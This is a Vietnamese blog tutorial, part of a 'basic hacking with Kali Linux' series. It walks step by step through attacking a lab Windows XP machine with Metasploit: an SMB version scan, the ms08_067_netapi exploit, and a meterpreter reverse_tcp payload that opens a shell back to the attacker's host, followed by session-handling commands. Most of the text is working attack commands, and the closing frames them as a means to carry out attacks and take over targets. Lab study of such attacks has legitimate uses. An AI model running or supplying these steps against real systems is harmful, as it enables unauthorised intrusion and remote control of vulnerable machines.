Hacking cơ bản với Kali Linux phần 3: Thực hành tấn công Windows XP bằng Metaspolit

Hacking cơ bản với Kali Linux phần 3: Thực hành tấn công Windows XP bằng Metaspolit


Mở đầu:

Ở bài trước mình đã nêu những bước cơ bản để sử dụng Metasploit khai thác một lỗi bảo mật. Còn bây giờ ta sẽ thực hành trên lab, sử dụng lỗ hỏng ms08_067_netapi và payload meterpreter để khai thác vào Windows XP.
Còn tuổi nào cho Windows XP.
Những máy ảo cần sử dụng trong bài này gồm:

Video Demo: 

Video Demo Exploit.

Bắt đầu thực hành:

Đầu tiên bạn hãy khởi động Metasloit lên, rồi dùng use để chọn exploit.

Chọn exploit và thiết lập tham số:

Trước tiên thì ta hãy dùng quét phiên bản windows cũng qua lỗ hỏng smb.
msf > use auxiliary/scanner/smb/smb_version
smb_version
smb_version
Xem các thiết lập cần thiết cho exploit này.
msf auxiliary(smb_version) > show options
show options
smb_version > show options
Bạn nhìn ở trên, yêu cầu tham số RHOSTS phải có (cột Required là yes), và cột Current Setting còn trống vì vậy ta phải thiết lập cho nó. Mục tiêu tấn công của ta là máy ảo Windows XP, vì vậy hãy điền IP của nó vào.
msf auxiliary(smb_version) > set RHOSTS 172.16.100.5
set RHOSTS
smb_version > set RHOSTS
Và bắt đầu quét:
msf auxiliary(smb_version) > exploit
exploit smb_version
exploit smb_version
Vậy là ta đã có được phiên bản hệ điều hành của mục tiêu: Windows XP SP0 / 1 (language:English).

Sử dụng exploit ms08_067_netapi:

Tiếp theo ta sẽ thực hiện tấn công qua exploit ms08_067_netapi:
msf auxiliary(smb_version) > use exploit/windows/smb/ms08_067_netapi
ms08_067_netapi
ms08_067_netapi
Xem các tham số cần thiết cho exploit này:
msf exploit(ms08_067_netapi) > show options
ms08_067_netapi > show options 
Tham số RHOST được yêu cầu chính là địa chỉ của mục tiêu:
msf exploit(ms08_067_netapi) > set RHOST 172.16.100.5
ms08_067_netapi > set RHOST
ms08_067_netapi > set RHOST

Chọn payload và thiết lập tham số:

Sau khi thiếp lập xong hãy kiểm tra lại, và chọn một payload. Mình sẽ sử dụng payload meterpreter/reverse_tcp:
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
ms08_067_netapi > show options
ms08_067_netapi > show options 
Thiết lập tham số LHOST là máy đang chạy Metasploit.
msf exploit(ms08_067_netapi) > set LHOST 172.16.100.2
ms08_067_netapi > set LHOST
ms08_067_netapi > set LHOST 

Xác định mục tiêu tấn công:

msf exploit(ms08_067_netapi) > show targets
ms08_067_netapi > show target
ms08_067_netapi > show target
Ở trên ta không tìm thấy cái tùy chọn đúng như phiên bản hệ điều hành có được ở rên, tuy nhiên có cái lựa chọn Windows XP SP0/SP1 Universal là gần giống, vậy ta cứ để Automatic Targeting:
msf exploit(ms08_067_netapi) > set target 0

Bắt đầu cho chạy exploit:

msf exploit(ms08_067_netapi) > exploit
ms08_067_netapi > exploit
ms08_067_netapi > exploit
Sau khi exploit thành công, Metasploit sẽ chạy payload được chọn, và lúc này là meterpreter shell, mình sẽ hướng dẫn sử dụng payload này ở phần sau, ta hãy thử vài lệnh nào!

Thử sử dụng payload:

Lệnh background trên meterpreter cho phép ta lưu lại session (phiên làm việc) và trở về Metasploit để tiếp tục làm việc trên Metasploit:
meterpreter > background
meterpreter > background

Kiểm tra các session đang chạy:

Để xem lại các session đang mở ta hãy gõ:
msf exploit(ms08_067_netapi) > sessions
ms08_067_netapi > sessions
ms08_067_netapi > sessions

Mở lại session:

Các thông tin của session sẽ được hiển thị ra, muốn truy cập lại vào session nào thì ta hãy dùng lệnh:
msf exploit(ms08_067_netapi) > sessions -i <ID>
sessions -i
sessions -i

Thoát ra:

Và cuối cùng tắt session hay thoát khỏi Metasploit ta dùng exit nhé.
exit metasploit

Lời kết:

Qua bài này ta đã hiểu rõ hơn về cách mà Metasploit hoạt động, từ đó ta có thể dễ dàng tìm hiểu thêm về các exploit và payload khác để thực hiện tấn công. Ở bài viết tiếp theo của series này mình sẽ hướng dẫn về payload meterpreter để sử dụng điều khiển và chiếm quyền hệ thống của mục tiêu.

0 nhận xét :